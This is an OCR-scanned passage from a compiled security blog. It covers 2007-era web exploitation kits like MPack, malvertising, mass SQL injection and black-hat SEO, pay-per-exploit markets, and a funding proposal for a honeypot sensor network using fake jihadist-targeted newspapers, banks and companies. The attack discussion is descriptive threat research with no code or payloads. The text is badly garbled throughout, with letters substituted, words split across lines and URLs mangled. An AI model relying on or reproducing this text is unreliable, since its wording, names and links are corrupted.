patched and outdated vulnerabilities and with end users 

continuing to actively utilize unpatched and outdated third- 
party software it shouldn't be surprising that today's 

botnets remain relatively easy to generate and orchestrate 
for the purpose of committing financial fraud. 

Malicious Economies of Scale literally means utilizing attack 
techniques and exploitation approaches to effi¬ 
ciently, yet cost and time effectively, infect or abuse as many 
victims as possible, in a combination with an added 



layer of improved metrics on the success of the campaigns. 
What are the most popular web exploitation kits that 

malicious parties use to achieve this? Which are the most 
popular vulnerabilities used in the majority of the kits? 

What are the most popular techniques for embedding 
malware? This white paper will outline this efficiency- 
centered 

attack model, and will cover web application vulnerabilities, 
client-side vulnerabilities, malvertising and black hat 

SEO (search engine optimization). 

An overview of the threats posed by rising number of 
malware embedded sites, with a discussion of the ex¬ 
ploitation techniques and kits used, as well as detailed 
summaries of all the high-profile such attacks during 2007. 

01. Reaching the Efficiency Scaie Through a Diverse 
Set of Expioited Vuinerabiiities 

2007 was the year in which client-side vulnerabilities 
significantly replaced server-side ones as the preferred 

choice of malicious attackers on their way to achieve the 
highest possible attack success rate, while keeping their in¬ 
vestment in terms of know-how and personal efforts to the 
minimum. Among the most successful such attacks during 

2007 was Storm Worm, the perfect example that the use of 
outdated and already patched vulnerabilities can result 

in aggregating the world's largest botnet according to 
industry and independent researchers' estimates. By itself. 



this 


attack technique is in direct contradiction with the common 
wisdom that zero day vuinerabiiities are more dangerous 

than aiready patched ones, however, the gang behind Storm 
Worm quickiy envisioned this biased statement as faise, 

and by standardizing the expioitation process with the heip 
of outdated vuinerabiiities achieved an enormous success. 

Years ago, whenever, a vuinerabiiity was found and expioit 
code reieased in the wiid, maiicious attackers used 

to quickiy reieased a do-it-yourseif expioitation kit to take 
advantage of a singie expioit oniy. Nowadays, that's no 

ionger the case, since by using a singie expioit whether an 
outdated, or zero day one, they're significantiy iimiting the 

probabiiity for a successfui attack, and therefore the more 
diverse and served on-the-fly is the set of expioits used in 

an attack, the higher wouid the success rate be. 

What was even more interesting to monitor during 2007, was 
the rise of high-profiie sites serving maiware, 

and the deciine of maiware coming from bogus ones. From 

the [3]Massive Embedded Malware Attack at a large 

Italian ISP to the Bank of India, the Syrian Embassy in 
the U.K, the U.S Consuiate in St. Petersburg, China's 
CSiRT, 

Possibiiity Media's entire portfoiio of E-zines, to the 

French government's site reiated to Lybia, these trusted web 



sites were all found to serve malware though an embedded 
link pointing back to the attacker's malicious server. Let's 

clarify what malicious economies of scale means, and how do 
they do it. 

02. What is malicious economies of scale, and how is 
it achieved? 
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Malicious economies of scale is a term I coined in 2007 to 
summarize the ongoing trend of efficiently attacking online 
users, by standardizing the exploitation process, and by 
doing so, not just lowering the entry barriers into 

the process of exploiting a large number of users, but also, 
maintaining a rather static success rate of infections. 

Malicious economies of scale is the efficient way by which a 
large number of end users get infected, or have their 

online abused, with the malicious parties maintaining a static 
attack model. It's perhaps more important to also 

describe how is the process achieved at the first place? The 
first strategy applied has to do with common sense in 

respect to the most popular software applications present at 
the end user's end, and the first touch-point in this case 

would be the end user's Internet browser. 

Having its version easily detected and exploit served, one 
that's directly matching the vulnerable version, is 

among the web exploitation kits main functionalities. Let's 
continue with the second strategy, namely to increase the 



probability of success. As I've already pointed out, do-it- 
yourself single vulnerability exploiting tools matured into 

web exploitation malware kits, now backed up with a diverse 
set of exploits targeting different client-side applications, 

which in this case is the process of increasing the probability 
of successful infection. The third strategy has to do 

with attracting the traffic to the malicious server, that as I've 
already discussed is already automatically set to 

anticipate the upcoming flood of users and serve the 
malware through exploiting client-side software 
vulnerabilities 

on their end. This is mainly done through exploiting remote 
file inclusion vulnerabilities within the high-profile 

targets, or through remotely exploitable web application 
vulnerabilities to basically embed a single line of code, 

or an obfuscated javascript that when deobfuscated will load 
the malicious URL in between loading the legitimate site. 

Popular Malware Embedded Attack Tactics 

This part of the article will briefly describe some of the most 
common attack tactics malicious parties use to 

embed links to their malicious servers on either high-profile 
sites, or any other site with a high pagerank, something 

they've started measuring as of recently according to threat 
intell assessment on an automated system to embed 

links based on a site's popularity. 



• The ''pull" Approach - Blackhat SEO, Harnessing the 
Trusted Audience of a Hacked Site 

In this tactic, malicious parties entirely rely on the end users 
to reach their malicious server, compared to the second 

tactic of "pushing" the malicious links to them. This is 
primarily accomplished through the use of Blackhat SEO 

tools generating junk content with the idea to successfully 
attract search engine traffic for popular queries, thus 

infecting anyone who visits the site, who often appear within 
the first twenty search results. The second "pull" 

approach such tactic is harnessing the already established 
trust of a site such as major news portal for instance, 

and by embedding a link to automatically load on the portal, 
have the users actually "pull" the malware for themselves 

• The "push" Approach - Here's Your Malware 
Embedded Link 

The "push" approach's success relies in its simple logic, with 
end users still worrying about downloading or clicking on 

email attachments given the overall lack of understanding 
on how to protect from sites serving malware, it's logical 

to consider that basically sending a link which once visited 
will automatically infect the visitor though exploiting a 

client-side vulnerability, actually works. Storm Worm is the 
perfect example, and to demonstrate what malicious 

economies of scale means once again, it's worth mentioning 
Storm's approach of having an already infected host 



act as an infection vector itself, compared to its authors 
having to register multiple domains and change them 

periodically. The result is malware embedded links exploiting 
client-side vulnerabilities in the form of an IP address, 

in this case an already infected host that's now aiming to 
infect another one 
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• Automatically Exploiting Web Application 
Vulnerabilities - Mass SQL Injection Attacks 

As I've already pointed out, malicious parties are not just 
efficiently scanning for remotely exploitable web application 

vulnerabilities or looking for ways to remotely include files on 
any random host, they've started putting efforts into 

analyzing the page rank, and overall popularity of a site they 
could exploit. This prioritizing of the sites to be used for a 
"pull" tactic is aiming to achieve the highest possible 
success rate by targeting a high-trafficked site, where even 

though the attack can be detected, the "window of 
opportunity" while the users were also accessing the 
malicious 

server could be far more beneficial than having a permanent 
malware link on a less popular site for an indefinite 

period of time. 

• Malicious Advertisements - Malvertising 

Among the most popular traffic acquisition tactics nowadays 
remain the active utilization of legitimate Web properties 



for the purpose of socially engineering an ad network 
provider into featuring a specific malware-serving advertising 

at the targeted Web site including active Web site 
compromise for the purpose of injecting rogue and malicious 
ads 

on the targeted host. 

Related posts: 

• [4]Historical OSINT - Malicious Malvertising Campaign, 
Spotted at FoxNews, Serves Scareware 

• [5]Cybercriminals Launch Malicious Malvertising Campaign, 
Thousands of Users Affected 

• [6]Managed SWF Injection Cybercrime-friendly Service 
Fuels Growth Within the Malvertising Market Segment 

• Buying Access to Hacked Cpanels or Web Servers 

Thanks to a vibrant DIY (do-it-yourself) Web malware 
exploitation kit culture including the active utilization of 
various 

DIY Web site exploitation and malware-generating 
cybercriminals continue actively utilizing stolen and 
compromised 

accounting data for the purpose of injecting malicious scripts 
on the targeted host further compromising the confi¬ 
dentiality availability and integrity of the targeted host. 

• Harvesting accounting data from malware infected 
hosts 



Having an administrator access to a domains portfolio, or any 
type of access though a web application backdoor or 

direct FTP/SSH, has reached its commercial level a long time 
ago. In fact, differentiated pricing applies in this case, 

on the basis of a site's page rank, whereas I've stumbled 
upon great examples of "underground goods liquidity" as 

a process, where access to a huge domains portfolio though a 
hacked Cpanels is being offered for cents with the 

seller's main concern that cents are better than nothing, 
nothing in the sense that she may loose access to the Cpanel 

before its being sold and thus ends up with nothing. Now, 
let's discuss the most popular malware exploitation kits 

currently in the wild. 

The Most Popular Web Malware Exploitation Kits 

Going into detail about the most common vulnerabilities 
used in the multitude of web malware exploitation 

kits could be irrelevant from the perspective of their current 
state of "modularity", that is, once the default installa¬ 
tion of the kit contains a rather modest set of exploits, the 
possibility to add new exploits to be used has long reached 

the point'n'click stage. Even worse, localizing the kits to 
different languages further contributes to their easy of use 

and acceptance on a large scale, just as is their open source 
nature making it easy for coders to use a successful kit's 



modules as a foundation for a new one - something's that's 
happening already, namely the different between a 

copycat kit and an original coded from scratch one. Among 
the most popular malware kits remain : 
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• A Brief Overview of MPack, icePack, Zunker, 
Advanced Pack and Fire Pack 

During 2007, Mpack emerged as the most popular malware 
exploitation kit. Originally available for purchase, by 

the time copies of the kit started leaking out, anyone from a 
script kiddie to a pragmatic attacker have obtained 

copy of it. Mpack's main strength is that of its well configured 
default installation, which in a combination with a 

rather modest, but then again, modular set of exploits 
included, as well as its point'n'click level of sophistication 

automatically turned it into the default malware kit. Mpack's 
malware kit has been widely used on nearly all of the 

high-profile malware embedded attacks during 2007, 
however, its popularity resulted in way too much industry 

attention towards its workings, and therefore, malicious 
parties starting coming up with new kits, still using Mpack 

as the foundation at least from a theoretical perspective. 

The list is endless, the Nuclear Malware kit, Metaphisher, old 
version of the WebAttacker and the Rootlauncher kit. 



with the latest and most advanced innovation named the 
Random JS Exploitation Kit. Compared to the previous one, 

this one is going a step beyond the usual centralized 
malicious server. 

With malicious parties now interested in controlling as much 
infected hosts with as little effort as possible, 

client-side vulnerabilities will continue to be largely abused 
in an efficient way thought web malware exploitation 

kits in 2008. The events that took place during 2007, clearly 
demonstrate the pragmatic attack approaches malicious 

parties started applying, namely realizing that an outdated 
but unpatched on a large scale vulnerability is just as 

valuable as a zero day one. 

1. httDs://ddanchev.blo as DOt.com/2018/10/dancho- 
danchevs-2010-disa D Dearance.html 

2. httDs://SDeakerdeck.com/ddanchev/ces a-h D-cvberintel- 
dancho 

3. httDs://ddanchev.blo as DOt.com/2017/05/historical-osint- 
inside-2007-2QQ9.html 

4. httDs://ddanchev.blo as DOt.com/2017/01/historical-osint- 
malicious-malvertisin a .html 

5. https://ddanchev.blo as pot.eom/2016/04/cvbercriminals- 
launch-malicious.html 

6. httDs://ddanchev.blo as Dot.com/2016/08/mana a ed-swf- 
ini ection-cvbercrime.html 
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zer^Hium 

Pay-Per-Exploit Acquisition Vuinerabiiity Programs - 
Pros and cons? (2018-10-22 17:47) 

As [l]ZERODiUM starts paying premium rewards to security 
researchers to acquire their previously unreported zero- 

day exploits affecting multiple operating systems software 
and/or devices a logical question emerges in the context of 

the program's usefulness the potential benefits including 
potential vulnerabilities within the actual acquisition process 

- how would the program undermine the security industry 
and what would be the eventual outcome for the security 

researcher in terms of 

[2]fueling growth in the cyber warfare market 
segment 

? 

In this post I'll discuss the m 
arket segment for p 
ay-per-exploit 
acquisition progr 
ams 

and discuss in-depth the current exploit- 



acquisition methodology utilized by different vendors 

and provide in-depth discussion on v 

arious over-the-counter 

acquisition methodologies 

applied by m 

alicious 

att 

ackers on their w 
ay to monetize 
access to m 
alw 

are-infected hosts while compromising the confidenti 

ality 

av 

ail 

ability 

and integrity of the t 

argeted 
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host including 



an 


active discussion on the ongoing 
and potenti 
al we 
aponiz 

ation of zero d 
ay vulner 

abilities int the context of tod 

ay's cyber w 

arf 

are world. 

Having greatly realized the potential of acquiring zero day 
vulnerabilities for the purpose of actively exploiting end 

users malicious actors have long been aware of the [3]over- 
the-counter acquisition market modei 

further enhancing their capabilities when launching 
malicious campaigns. Among the most widely [4]spread 
myth 

about zero day vuinerabiiities is the fact that 

[5]zero day vuinerabiiities arethe primary growth 
factor of the cybercrime ecosystem 

further resulting in a multi-tude of malicious activity 
targeting end users. 



With vendors continuing to est 

ablish the found 

ations for 

active vulner 

a bility and exploit 

acquisition progr 

ams third-p 

arty vendors 

and rese 

arch org 

aniz 

ations continue successfully disintermed 

ating the vendor's m 

ajor vulner 

ability 
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and exploit 

acquisition progr 

ams successfully resulting in the I 


aunch 



and est 


ablishment of third-p 
arty services 

and products further popul 

ating the security-industry with rel 

ated products 

and services potenti 

ally 

acquiring "know-how" 
and relev 
ant vulner 
ability 

and exploit inform 
ation from m 
ajor vendors further I 
aunching rel 
ated comp 
anies 

and services potenti 
ally empowering third-p 



arty rese 
archers vendors 
and individu 
als including n 
ation-st 
ate 

actors with potent! 

al we 

aponiz 

ation c 

ap 
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abilities potent! 
ally le 

ading to successful t 
arget- 

acquisition pr 
actices on beh 
alf of third-p 
arty rese 



archers 


and individu 
als. 

Becoming 
a t 

arget in the widespread 
context of third-p 
arty vendors 
and rese 

archers might not be the wisest 
appro 

ach when undermining potenti 

aI rese 

arch 

and in-house rese 
arch 

and benchm 
arking 

activities in terms of e v alu 
ating 



and responding to vulner 
abilities 

and exploits. Vendors looking for w 
ays to efficiently improve the over 
all security 
and product perform 

ance in terms of security should consider b 
asic intern 
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al benchm 
arking pr 

actices and should also consider a possible incentive-based 
type of vulnerability and exploit reward-type of 

revenue-sharing program potentially rewarding company 
employees and researchers with the necessary tools and 

incentives to find and discover and report security 
vulnerabilities and exploits. 

Something else worth pointing out in terms of vulnerability 
research and exploit discovery is a process which can be 

best described as the life-cycle of a zero day vulnerability 
and exploit which can be best described as a long-run 

process utilized by malicious and fraudulent actors 
successfully utilizing client-side exploits for the purpose of 



successfully dropping malicious software on the hosts of the 
targeted victims which often rely on outdated and 

patched vulnerabilities and the overall misunderstanding 
that zero day vulnerabilities and exploits are the primary 

growth factor of the security-industry and will often rely on 
the fact that end users and enterprises are often 

unaware of the basic fact that cybercriminals often rely on 
outdated and patched vulnerabilities successfully 

targeting thousands of users globally on a daily basis. 

What used to be a market-segment dominated by DIY (do-it- 
yourself) exploit and malware-generating tools is 

today's modern market-segment dominated by Web 
malware-exploitation kits successfully affecting thousands of 

users globally on a daily basis. In terms of Web-malware 
exploitation kits among the most common misconceptions 

regarding the utilization of such type of kits is the fact that 
the cybercriminals behind it rely on newly discovered 

exploits and vulnerabilities which in fact rely on 

[6]outdated and already patched security 
vulnerabilities and 

exploits for the purposes of successfully enticing thousands 
of users globally into falling victim into 

social-engineering driven malicious and fraudulent 
campaigns. 

Despite the evident usefulness from a malicious actor's point 
of view when launching malicious campaigns malicious 



actors continue utilizing outdated vulnerabilities for the 
purpose of launching malicious campaigns further utilizing a 

multi-tude of social engineering attack vectors to enhance 
the usefulness of the exploitation vector. Another crucial 

aspect of the pay-per-exploit acquisition vulnerability model 
is, the reliance on outdated and unpatchted 

vulnerabilities for the purpose of launching malicious 
campaigns further relying on the basic fact that on the 

majority of occasions end users fail to successfully update 
their third-party applications often exposing themselves 

to a variety of successful malicious campaigns utilizing 
outdated and unpatched vulnerabilities. 

We expect to continue observing an increase in the pay-per- 
exploit acquisition model with, related acquisition 

model participants continuing to acquire vulnerabilities 
further fueling growth into the market segment. We expect 

that malicious actors will adequately respond through over- 
the-counter acquisition models including the utilization 

of outdated and unpatched vulnerabilities. End users are 
advised to continue ensuring that their third-party 

applications are updated to build a general security 
awareness and to ensure that they're running a fully patched 

antivirus solution. 

Consider going through the foiiowing reiated posts: 

[7]Researchers spot new Web malware exploitation kit 



[8] Web malware exploitation kits updated with new Java 
exploit 

[9] Which are the most commonly observed Web exploits in 
the wild? 

[lOJReport: Patched vulnerabilities remain prime exploitation 
vector 

[llJReport: malicious PDF files becoming the attack vector of 
choice 

[12]Malvertising campaigns at multiple ad networks lead to 
Black Hole Exploit Kit 

[13J56 percent of enterprise users using vulnerable Adobe 
Reader plugins 

[14]Report: third party programs rather than Microsoft 
programs responsible for most vulnerabilities 

[ISJReport: malicious PDF files becoming the attack vector of 
choice 
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[16]Malvertising campaigns at multiple ad networks lead to 
Black Hole Exploit Kit 

[17J56 percent of enterprise users using vulnerable Adobe 
Reader plugins 

[18] Report: third party programs rather than Microsoft 
programs responsible for most vulnerabilities 

[19] Report: 64 % of all Microsoft vulnerabilities for 2009 
mitigated by Least Privilege accounts 



[20] Secunia: popular security suites failing to block exploits 

[21] 37 percent of users browsing the Web with insecure Java 
versions 

[22] Which are the most commonly observed Web exploits in 
the wild? 

[23] Report: Malicious PDF files comprised 80 percent of all 
exploits for 2009 

[24] Secunia: Average insecure program per PC rate remains 
high 

1. httDs://zerodium.com/Dro a ram.html 

2. httDs://www.webroot.com/blo a /2013/12/27/cvbercrime- 
trends-2Q13-vear-review/ 

3. httD://www.zdnet.com/article/black-market-for-zero-da v- 
vulnerabilities-still-thrivin g/ 

4. httDs://www.zdnet.com/article/seven-mvths-about-zero- 
dav-vulnerabilities-debunked 

5. httDs://www.zdnet.com/article/reDort-Datched- 
vulnerabilities-remain-prime-exploitation-vector/ 

6 . 

https://www.zdnet.com/article/a-patched-browser-false- 

feelin a -of-securitv-or-a-securitv-utopia-that-actu 

all v-exists/ 

7. https://www.zdnet.com/article/researchers-spot-new-web- 
mal ware-exploitation-kit/ 
































8. httDs://www.zdnet.com/blo a /securitv/web-malware- 
exDloitation-kits-uDdated-with-new- i ava-exDloit/9849 

9. httDs://www.zdnet.com/blo a /securitv/which-are-the-most- 
commonlv-observed-web-exploits-in-the-wild/lQ261 

10. httDs://www.zdnet.com/blo a /securitv/reDort-Datched- 
vulnerabilities-remain-prime-exploitation-vector/8162 

11. https://www.zdnet.com/article/report-malicious-pdf-files- 
becomin a -the-attack-vector-of-choice/ 

12 . 

httDs://www.zdnet.com/article/malvertisin a -camDai a ns-at- 

multiole-ad-networks-lead-to-black-hole-exoloit- 

kit/ 

13. httDs://www.zdnet.com/article/56-Dercent-of-enterDrise- 
users-usin a -vulnerable-adobe-reader-olu a ins/ 

14. httDs://www.zdnet.com/article/reDort-third-Dart v- 
Dro a rams-rather-than-microsoft-oro a rams-resDonsible-for 

-most-vulnerabilities/ 

15. httDs://www.zdnet.com/article/reDort-malicious-Ddf-files- 
becomin g -the-attack-vector-of-choice/ 

16. 

httDs://www.zdnet.com/article/malvertisin a -camDai a ns-at- 

multiole-ad-networks-lead-to-black-hole-exoloit- 


kit/ 




























































17. httDs://www.zdnet.com/article/56-Dercent-of-enterDrise- 
users-usin g -vulnerable-adobe-reader-Dlu a ins/ 

18. httDs://www.zdnet.com/article/reDort-third-Dart v- 
pro a rams-rather-than-microsoft-pro a rams-responsible-for 

-most-vulnerabilities/ 

19. httDs://www.zdnet.com/article/reDort-64-of-all-microsoft- 
vulnerabilities-for-2QQ9-miti a ated-bv-least- pri 

vile a e-accounts/ 

20. https://www.zdnet.CQm/article/secunia- po pular-securit v- 
suites-failin a -to-block-exDloits/ 

21. httDs://www.zdnet.com/article/37-Dercent-of-users- 
browsin a -the-web-with-insecure- i ava-versions/ 

22. httDs://www.zdnet.cQm/article/which-are-the-most- 
commonlv-observed-web-exDloits-in-the-wild/ 

23. httDs://www.zdnet.com/article/report-malicious-Ddf-files- 
comprised-80-percent-of-all-exploits-for-2009/ 

24. https://www.zdnet.com/article/secunia-avera a e-insecure- 
proa ram-per-pc-rate-remains-hi ah/ 
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Cyber Security Project Investment Proposal - DIA 
Needipedia - Fight Cybercrime and Cyber Jihad With 

Sensors - Grab Your Copy Today! (2018-12-16 13:52) 

Dear blog readers, I decided to share with everyone a 
currently pending project investment proposal regarding the 

upcoming launch of a proprietary Technical Collection 
analysis platform with the project proposal draft available on 

request part of [IJDIA's Needipedia Project Proposal 
Investment draft or eventually through the [2]Smith 
Richardson Foundation. 

In case you're interested in working with me for the purpose 
of implementing the project solution including a 




possible investment proposal on your behalf - that also 
includes a possible VC or an angel investor introduction - I 

can be reached at dancho.danchev(g)hush.com 

Looking forward to receiving your comments questions 
feedback and general remarks including possible in¬ 
vestment proposal requests. Happy Holidays! 

Enjoy! 

01. Executive summary 

The Obmonix platform aims to build the world's most 
versatile and comprehensive sensor network for intercepting 

cybercrime and cyber jihad activity on a global scale 
successfully positioning the project as a leading in-house 
built 

provider for actionable intelligence within the Intelligence 
Community. 

02. What are you trying to do? 

The Obmonix platform aims to build the world's most 
versatile and comprehensive sensor network for intercepting 
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cybercrime and cyber jihad activity successfully positioning 
the platform as a leading in-house provider of actionable 

intelligence within the Intelligence Community. 

03. How is it currentiy done? 

Largely relying on a selected set of outsourced intelligence¬ 
gathering providers the Intelligence Community overall 

reliance on commercial intelligence gathering providers has 
successfully positioned the Intelligence Community with 

a limited sight in terms of pro-active and systematic response 
to cybercrime and cyber jihad events globally. 

04. What's new? 

Largely relying on the utilization of multiple interception 
vectors including hybrid-based type of sensor networks the 

Intelligence Community is successfully positioned to 
successfully intercept and proactively respond to a growing 
set 

of cybercrime and cyber jihad events globally. 






05. Who cares? 


The Intelligence Community largely positioned to take 
advantage of a growing set of technologies for the purpose 

of pro-actively responding to a growing set of cybercrime and 
cyber jihad events globally is ultimately empowered 

to take advantage of modern hybrid-based type of sensor 
networks for the purpose of successfully intercepting and 

responding to a growing set of cybercrime and cyber jihad 
events globally. 

06. What are the risks? 

Successfully positioning the provider as a leading provider 
for actionable intelligence in terms of cybercrime and 

cyber jihad events globally within the Intelligence 
Community will successfully position the Obmonix platform 
and 

its operator as a leading provider of actionable intelligence 
within the Intelligence Community. 

Transmittal Letter 

My name is Dancho Danchev I'm an internationally 
recognized cybercrime researcher security blogger and 

threat intelligence analyst currently maintaining some of the 
industry's leading threat intelligence gathering 

information-sharing resources having successfully 
contributed to the overall demise of cybercrime 
internationally 



having successfully monitored analyzed and processed some 
of the industry's major nation-state and malicious actor 

type of malicious campaigns over the last decade leading me 
to a successful career as a cybercrime researcher 

security blogger and threat intelligence analyst leading me 
to a successful launch of my newly launched startup 

named Disruptve Individuals and the Obmonix - Cybercrime 
and Cyber Jihad Fighting Sensor Network. 
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Having successfully pioneered my own methodology for 
processing threat intelligence data including active 

dissemination of threat intelligence data to a variety of 
sources including an in-depth understanding of the Intel¬ 
ligence Cycle I'm certain that based on my experience the 
time has come to establish a professional and working 

relationship with a government-private sector enterprise 
leading me to a successful project proposal within the 

Intelligence Community and the security industry. 

My initial goal for submitting a project proposal is to ensure 
that the Intelligence Community remains on the 

top of its game and that the United States remains ahead of 
adversaries looking to profit from its economic might 

including the successful compromise of its infrastructure 
potentially targeting the life's and well-being of its citizens 


globally. 



Largely relying on a set of industry-leading contacts my 
initial idea is to ensure that the Intelligence Commu¬ 
nity remains actively empowered with the world's largest and 
most comprehensive platform for monitoring profiling 

and proactively responding to malicious nation-state 
malicious actors type of cybercrime and cyber-jihad activity 

globally through the successful establishing of a 
government-private sector type of partnership leading me to 
a 

successful launch of my own company leading me to a 
successful project-based type of project proposal. 

Having actively contributed to the overall demise of 
cybercrime internationally through the last decade I'm 

certain that my expertise ambition and expertise in the field 
will successfully contribute to the Intelligence Commu¬ 
nity's overall mission including a currently active project 
within the Intelligence Community and the security industry. 

I sincerely hope that my project proposal will be eventually 
funded leading me to become an active partici¬ 
pant within the Intelligence Community with a currently 
active project within the Intelligence Community and the 

security-industry. 
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n “ 



a Disruptive 
Individuals 


Company Overview 





The following brief will provide a detailed summary of the 
company overview including key success factors 

and a project taxonomy. 

Disruptive Individuals is a research-intensive data-driven 
company successfully establishing the world's largest 

187 

snapshot of malicious cybercrime activity for the purpose of 
offering the industry the world's most versatile portfolio of 
malicious cybercrime-driven services successfully positioning 
itself as the world's leading provider of real- time 

intelligence-driven services and product portfolio including 
cybercrime-research data malicious activity profiling 

services and custom-tailored intelligence assessments 
successfully positioning the company as the world's leading 

provider of cybercrime-data driven research-intensive 
intelligence data-driven company. 

Key Success Factors 

• the platform will be ultimately capable of establishing the 
industry's largest data set of cybercrime activity 

for the purpose of real-time monitoring and profiling of 
malicious cybercrime activity successfully infiltrating 

the majority of cybercrime forum communities successfully 
establishing the foundations for an intelligence 


gathering process 



• the platform will be ultimately capable of real-time forum 
data localization for the purpose of successfully es¬ 
tablishing the foundations for a successful intelligence 
gathering process 

• the platform will be ultimately capable of establishing the 
foundations for real-time monitoring and profiling 

of malicious activity including forum member data 
successfully establishing the foundations for a successful 

intelligence gathering process 

• the platform will be ultimately capable of establishing the 
world's largest data set of historical cybercrime activity 

successfully establishing the foundations for a successful 
intelligence gathering process 

Return on Investment 

• research-based forum activity driven intelligence feeds 

• the company will be ultimately capable of offering 
subscription based type of intelligence driven services in¬ 
cluding intelligence and data-driven cybercrime and 
malicious-activity capable feeds 

• community-driven data processing capabilities 

• the company will be ultimately capable of offering public 
feeds to include the necessary data for the purpose of 

establishing an active community-based intelligence-data 
driven type of intelligence-data driven type of services 



and feeds 


• intelligence feed subscription type of managed 
intelligence-feed driven services 

• the company will be ultimately capable of offering tailored 
intelligence-driven data feeds successfully empower¬ 
ing security enthusiasts security experts researchers and 
government contractors with the necessary data and 

expertise to offer an insight into the company's vast network 
of data and intelligence driven type of services 

Company Data Project Taxonomy 

This intelligence brief will details the basic company project 
taxonomy structure for the purpose of establishing the 

foundations for a successful data and intelligence-driven 
type of research based type of cybercrime and malicious- 

activity tracking activity to include but not limited to 
cybercrime community forum data and active social media 
mon¬ 
itoring and, profiling capabilities. 

Cybercrime Sensor Network 
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This intelligence brief will details the basic company project 
taxonomy structure for the purpose of establishing the 
foundations for a successful data and intelligence-driven 
type of research based type of cybercrime and malicious- 
activity tracking activity to include but not limited to 



cybercrime community forum data and active social media 
mon¬ 
itoring and profiling capabilities. 

Spam Message 

• spam source 

• spam message 

• nation-state actors 

• malicious-adversaries 

• country 

• hosting provider 

• ASN 

• IP reputation 

• message 

• embedded URL 

• embedded attachment 
Phishing Message 

• phishing source 

• phishing message 

• nation-state 


malicious-actors 




• spear-phishing 

• targeted-attack 

• country 

• hosting provider 

• ASN 

• IP reputation 

• message 

• embedded URL 

• embedded attachment 
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Malicious Software 

• nation-state actors 

• malicious-adversaries 

• C &C phone back location 

• country 

• hosting location 

• ASN 

• screenshot 

• malicious MD5 


Maiicious URL 





nation-state actors 


• malicious-adversaries 

• country 

• hosting provider 

• ASN 

• client-side exploitation 

• client-side exploit sample 
Android malware 

• nation-state actors 

• malicious-adversaries 

• C &C phone back 

• country 

• hosting provider 

• ASN 

• SMS feature 

• Screenshot 

• malicious MD5 
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Mac OS X malware 


nation-state actors 




malicious-adversaries 


• C &C phone back 

• country 

• hosting provider 

• ASN 

• Screenshot 

• malicious MD5 

Explanation of Honeypot Technology 

Honeypot technology greatly ensures that actionable and 
real-time data of jihadist activities can be acquired profiled 

and analyzed acting as an early warning system for jihadist 
activity online.lt relies on the systematic positioning of 

misconfigured network devices to better allow the use of 
monitoring sensors attracting malicious traffic leading to an 

eventual compromise allowing for better understanding of 
the motivation and capability estimation of the attacker 

including active motivation and capabilities type of 
attribution leading to the production of actionable real-time 
type 

of intelligence type of research and analysis type of data. 

Honepot Deployment Strategy 

Honeypot technology greatly ensures that actionable and 
real-time data of jihadist activities can be acquired profiled 




and analyzed acting as an early warning system for jihadist 
activity online. 

• Fake Newspaper - Al-Jihah 

The initial idea behind setting up a fake newspaper (in 
Persian, Arabic) would be to establish the foundation for a 

successful deceptive early warning system sensor further 
ensuring that actionable and real-time jihadist activity data 

can be collected profiled and interpreted for producing real¬ 
time intelligence summary reports. Daily updates with 

pro-jihadist material would ensure the quality acquisition of 
traffic including potential deceptive campaigns to be 

intercepted profiled an analyzed acting as an early warning 
system sensor further ensuring the collection of actionable 

real-time jihadist activities data. 

The Al-Jilah newspaper would act as a central repository for, 
various anti-jihad content successfully positioning the 

paper as a primary attack target for cyber jihadist online 
successfully increasing the probability for a successful attack 

and eventually collecting and interpreting the attack data. 
The Al-Jilah newspaper would act as a central repository 

of anti-jihad content and would be localized in Persian in 
Arabic successfully penetrating local and highly segmented 

markets for the purpose of increasing the probability of a 
successful attack. 



Various public placement strategy in terms of positioning the 
honeypot technology within the eventual attack 

compromise activity would include active search engine 
optimization techniques successfully leading to a great 

degree of capability estimation attack traffic and would also 
result in eventual direct forum placement within various 

prominent jihadist activity online forum communities. 
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• Fake Bank - Arabah Financing 

The initial idea behind setting up a fake bank (in Persian, 
Arabic) would be to establish the foothold of a deceptive 

campaign ensuring the collection of actionable real-time time 
jihadist data to be analyzed and profiled. Successfully 

positioning the bank within the network assets acquisition 
would ensure the collection of actionable and real-time 

jihadist data further ensuring the successful interception of 
jihadist activities online. 

The initial idea behind setting up a fake bank would be to 
successfully position a fake Web site successfully resulting 

in the active deployment of honeypot appliance technologies 
for the purpose of monitoring and profiling various 

jihadist activity online. Successfully setting up a fake bank in 
Persian and Arabic would result in the active penetration 

of various market segment properties successfully resulting 
in the active profiling and monitoring of jihadist activity 



online. 


Successfully setting up a fake bank would result in the active 
publication of content inter-related news releases 

emphasizing on major localized and segment released type 
of content successfully resulting in the active profiling 

and monitoring of various jihadist activity online.Successful 
positioning in terms of points of contact would ensure 

active phishing and malware attack profiling and monitoring 
successfully resulting in active profiling and monitoring 

of jihadist activity online. 

• Fake university - Abkazah University 

The initial idea behind setting up a fake university (in 
Persian, Arabic) would be to establish the foothold of a 
deceptive campaign ensuring the collection of actionable 
real-time time jihadist data to be analyzed and profiled. 
Successfully 

positioning the bank within the network assets acquisition 
would ensure the collection of actionable and real-time 

jihadist data further ensuring the successful interception of 
jihadist activities online.Successful positioning in terms 

of points of contact would ensure active phishing and 
malware attack profiling and monitoring successfully 
resulting 

in active profiling and monitoring of jihadist activity online. 

The initial idea of setting up a fake university would result in 
the active profiling and monitoring of various jihadist 



community type of jihadist activity online successfully 
positioning a localized in Persian and Arabic fake university 

successfully resulting in the active profiling and monitoring 
of jihadist activity online. Sample fake university content 

type of localized fake university portfolio of facilities and 
educational courses would result in the active positioning 

for a localized and segmented active profiling and 
monitoring of jihadist activity online. 

It would consist of active SCADA research and cyber security 
type of research and analysis facility allowing the active 

monitoring of malicious activity, for the origin source country 
Iran, Pakistan, Saudi Arabia, Iraq and Syria.Successful 

positioning in terms of points of contact would ensure active 
phishing and malware attack profiling and monitoring 

successfully resulting in active profiling and monitoring of 
jihadist activity online. 

• Fake Company - Ostan Industries 

The initial idea behind setting up a fake company would be 
to successfully intercept and profile actionable real-time 

jihadist activities online to successfully intercept and profile 
various jihadist activities online.The initial idea behind 
setting up a fake company would be to position a SCADA 
type of infrastructure localized in Persian, Arabic for the 

purpose of successfully profiling and monitoring various 
jihadist activity online. 



With a successful placement and active content generating 
localized in Persian, Arabic a fake company deployment 

using honeypot appliance technology would result in active 
capability estimation and profiling of various jihadist 
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activity online.Successful positioning in terms of points of 
contact would ensure active phishing and malware attack 
profiling and monitoring successfully resulting in active 
profiling and monitoring of jihadist activity online. 

Cyber Jihad Sensor Network 

This intelligence brief will details the basic company project 
taxonomy structure for the purpose of establishing the 

